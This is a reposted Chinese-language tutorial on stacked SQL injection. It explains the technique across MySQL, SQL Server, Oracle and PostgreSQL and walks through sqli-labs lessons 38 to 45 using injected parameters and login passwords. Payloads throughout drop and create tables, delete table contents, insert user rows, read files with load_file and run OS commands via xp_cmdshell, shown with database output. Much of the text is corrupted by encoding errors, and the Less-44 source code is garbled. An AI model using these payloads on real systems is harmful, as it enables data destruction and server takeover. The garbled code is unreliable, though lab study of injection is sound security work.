堆叠注入详解
0x00 堆疊注入定義
? ? ??Stacked injections(堆疊注入)從名詞的含義就可以看到應(yīng)該是一堆 sql 語句(多條)一起執(zhí)行。而在真實(shí)的運(yùn)用中也是這樣的, 我們知道在 mysql 中, 主要是命令行中, 每一條語句結(jié)尾加; 表示語句結(jié)束。這樣我們就想到了是不是可以多句一起使用。這個(gè)叫做 stacked? injection。
0x01 堆疊注入原理
??? ??在SQL中,分號(;)是用來表示一條sql語句的結(jié)束。試想一下我們在?;?結(jié)束一個(gè)sql語句后繼續(xù)構(gòu)造下一條語句,會(huì)不會(huì)一起執(zhí)行?因此這個(gè)想法也就造就了堆疊注入。而union?injection(聯(lián)合注入)也是將兩條語句合并在一起,兩者之間有什么區(qū)別么?區(qū)別就在于union?或者union?all執(zhí)行的語句類型是有限的,可以用來執(zhí)行查詢語句,而堆疊注入可以執(zhí)行的是任意的語句。例如以下這個(gè)例子。用戶輸入:1;?DELETE?FROM?products服務(wù)器端生成的sql語句為: Select?*?from?products?where?productid=1;DELETE?FROM?products當(dāng)執(zhí)行查詢后,第一條顯示查詢信息,第二條則將整個(gè)表進(jìn)行刪除。
0x02 堆疊注入的局限性
堆疊注入的局限性在于并不是每一個(gè)環(huán)境下都可以執(zhí)行,可能受到API或者數(shù)據(jù)庫引擎不支持的限制,當(dāng)然了權(quán)限不足也可以解釋為什么攻擊者無法修改數(shù)據(jù)或者調(diào)用一些程序。
此圖是從原文中截取過來的,因?yàn)槲覀€(gè)人的測試環(huán)境是php+mysql,是可以執(zhí)行的,此處對于mysql/php存在質(zhì)疑。但個(gè)人估計(jì)原文作者可能與我的版本的不同的原因。雖然我們前面提到了堆疊查詢可以執(zhí)行任意的sql語句,但是這種注入方式并不是十分的完美的。在我們的web系統(tǒng)中,因?yàn)榇a通常只返回一個(gè)查詢結(jié)果,因此,堆疊注入第二個(gè)語句產(chǎn)生錯(cuò)誤或者結(jié)果只能被忽略,我們在前端界面是無法看到返回結(jié)果的。因此,在讀取數(shù)據(jù)時(shí),我們建議使用union(聯(lián)合)注入。同時(shí)在使用堆疊注入之前,我們也是需要知道一些數(shù)據(jù)庫相關(guān)信息的,例如表名,列名等信息。
0x03 各個(gè)數(shù)據(jù)庫實(shí)例介紹
本節(jié)我們從常用數(shù)據(jù)庫角度出發(fā),介紹幾個(gè)類型的數(shù)據(jù)庫的相關(guān)用法。數(shù)據(jù)庫的基本操作,增刪查改。以下列出數(shù)據(jù)庫相關(guān)堆疊注入的基本操作。
1.Mysql
(1)新建一表?
select * from users where id=1;create table test like users;執(zhí)行成功,我們再去看一下是否新建成功表。
(2)刪除上面新建的test表
select * from users where id=1;drop table test;(3)查詢數(shù)據(jù)
select * from users where id=1;select 1,2,3;(4)加載文件??
select * from users where id=1;select load_file('c:/tmpupbbn.php');(4) 修改數(shù)據(jù)
select * from users where id=1;insert into users(id,username,password) values ('100','new','new');2. Sql server
(1)增加數(shù)據(jù)表
select * from test;create table sc3(ss CHAR(8));(2) 刪除數(shù)據(jù)表
select * from test;drop table sc3;(4)查詢數(shù)據(jù)
select 1,2,3;select * from test;(5)修改數(shù)據(jù)
select * from test;update test set name='test' where id=3;(5)sqlserver中最為重要的存儲(chǔ)過程的執(zhí)行
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'3.Oracle
上面的介紹中我們已經(jīng)提及,oracle不能使用堆疊注入,可以從圖中看到,當(dāng)有兩條語句在同一行時(shí),直接報(bào)錯(cuò)。無效字符。后面的就不往下繼續(xù)嘗試了。
4.Postgresql
(1)新建一個(gè)表??
select * from user_test;create table user_data(id DATE);可以看到user_data表已經(jīng)建好。
(2)刪除上面新建的user_data表
select * from user_test;delete from user_data;(3)查詢數(shù)據(jù)
select * from user_test;select 1,2,3;(4) 修改數(shù)據(jù)
select * from user_test;update user_test set name='modify' where name='張三';
?
0x04 堆疊注入之sqllaps實(shí)列
?
1.Less-38 堆疊注入 - 字符型 - GET
(1)源代碼
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";?
(2)測試
?id=1’;insert into users(id,username,password) values (‘38’,’less38’,’hello’)–+ mysql> select * from users;+----+----------+------------+| id | username | password |+----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2| admin2 || 11 | admin3| admin3 || 12 | dhakkan| dumbo || 14 | admin4| admin4 || 38 | less38| hello |+----+----------+------------+14 rows in set (0.00 sec)發(fā)現(xiàn)已經(jīng)添加了一個(gè) less38 用戶
?id=1’;create table less38 like users;
?id=1’;drop table less38;
2.Less-39 堆疊注入 - 整型 - GET
(1)源代碼
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";(2)測試
?id=1;insert into users(id,username,password) values (‘39’,’less39’,’hello’)–-?
mysql> select * from users;+----+----------+------------+| id | username | password |+----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2| admin2 || 11 | admin3| admin3 || 12 | dhakkan| dumbo || 14 | admin4| admin4 || 38 | less38| hello || 39 | less39| hello |+----+----------+------------+15 rows in set (0.00 sec)可以看到已經(jīng)添加了 less39 用戶了
?id=1;create table less39 like users;
?id=1;drop table less39;
3.Less-40 盲注 - 堆疊注入 - 字符型 - GET
(1)源代碼
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";(2)測試
?id=1’); insert into users(id,username,password) values (‘40’,’less40’,’hello’)–+?
mysql> select * from users;+-----+----------+------------+| id | username | password |+-----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2 | admin2 || 11 | admin3 | admin3 || 12 | dhakkan | dumbo || 14 | admin4 | admin4 || 38 | less38 | hello || 39 | less39 | hello || 109 | hello| hello || 40 | less40 | hello |+-----+----------+------------+17 rows in set (0.00 sec)看到添加了 less40 用戶
?id=1’);create table less40 like users;
?id=1’);drop table less40;
4.Less-41 盲注 - 堆疊注入 - 整型 - GET
(1)源代碼
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";(2)測試(盲注)
創(chuàng)建users表和增加字段值
?id=1; insert into users(id,username,password) values (‘110’,’less41’,’hello’)–+ mysql> select * from users;+-----+----------+------------+| id | username | password |+-----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2 | admin2 || 11 | admin3 | admin3 || 12 | dhakkan | dumbo || 14 | admin4 | admin4 || 38 | less38 | hello || 39 | less39 | hello || 109 | hello| hello || 40 | less40 | hello || 110 | less41| hello |+-----+----------+------------+18 rows in set (0.00 sec)添加了用戶 less41
?id=1;create table less41 like users;? //增加表
?id=1;drop table less41;? //刪除表
5.Less-42 報(bào)錯(cuò)型堆疊注入 - 字符型 - POST
(1)源代碼(login.php):
?
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";?
Password 變量在post 過程中,沒有通過 mysql_real_escape_string() 函數(shù)的處理。因此在登錄的時(shí)候密碼選項(xiàng)我們可以進(jìn)行 attack。
(2)報(bào)錯(cuò)測試
測試語句:
username:任意password : c';drop table me# # 刪除 me 表或者:
username:任意password : c';create table me like users# // 創(chuàng)建一個(gè) me 表登錄之前查看表:
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| referers|| uagents|| users|+--------------------+4 rows in set (0.00 sec)登錄前創(chuàng)建表
username :adminpassword : c';create table less42 like users#登錄后查看創(chuàng)建表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| less42|| referers|| uagents|| users|+--------------------+5 rows in set (0.00 sec)發(fā)現(xiàn)添加了一個(gè) less42 表,登錄時(shí)構(gòu)造的 sql 語句為:
SELECT * FROM users WHERE username=’admin’ and password=’c’;create table less42 like users–+ //利用 c’;drop table me#作為登錄密碼,刪除該表。登錄前刪除表
username: admin password : c’;drop table less42#登錄后查看刪除表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| referers|| uagents|| users|+--------------------+4 rows in set (0.00 sec)6.Less-43 報(bào)錯(cuò)型 - 堆疊注入 - 字符型 - POST
(1)源代碼
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";(2)測試
登錄前測創(chuàng)建表
username : adminpassword: c');create table less43 like users#登錄后查看增加表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| less43|| referers|| uagents|| users|+--------------------+5 rows in set (0.00 sec)登錄前測試刪除表
username :adminpassword : c');drop table less43#登錄后查看刪除表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| referers|| uagents|| users|+--------------------+4 rows in set (0.00 sec)6.Less-44 盲注 - 堆疊注入 - 字符型 - POST
(1)源代碼
username=mysqlirealescapestring(username=mysqlirealescapestring(con1, POST[“l(fā)oginuser”]);POST[“l(fā)oginuser”]); password =POST[“l(fā)oginpassword”];POST[“l(fā)oginpassword”]; sql = "SELECT * FROM users WHEREusername='username′andpassword=′username′andpassword=′password’”;(2)測試(盲注)
登錄前測試插入表和值
username : adminpassword : a';insert into users(id,username,password) values ('144','less44','hello')#登錄后查看增加表和值
mysql> select * from users;+-----+----------+------------+| id | username | password |+-----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2 | admin2 || 11 | admin3 | admin3 || 12 | dhakkan | dumbo || 14 | admin4 | admin4 || 38 | less38 | hello || 39 | less39 | hello || 109 | hello| hello || 40 | less40 | hello || 110 | less41| hello || 144 | less44| hello |+-----+----------+------------+19 rows in set (0.00 sec)7.Less-45 報(bào)錯(cuò)型堆疊注入 - 字符型 - POST
(1)源代碼
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";(2)測試
登錄前測試增加表
username : adminpassword : c');create table less45 like users# //創(chuàng)建了less45表登錄后查看增加表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| less45|| referers|| uagents|| users|+--------------------+5 rows in set (0.00 sec)登錄前測試刪除表
username: adminpassword : c');drop table less45#登錄后查看刪除表
mysql> show tables;+--------------------+| Tables_in_security |+--------------------+| emails|| referers|| uagents|| users|+--------------------+4 rows in set (0.00 sec)轉(zhuǎn)載于:https://www.cnblogs.com/backlion/p/9721687.html
總結(jié)
- 上一篇: redis as session_han
- 下一篇: (数论)51NOD 1135 原根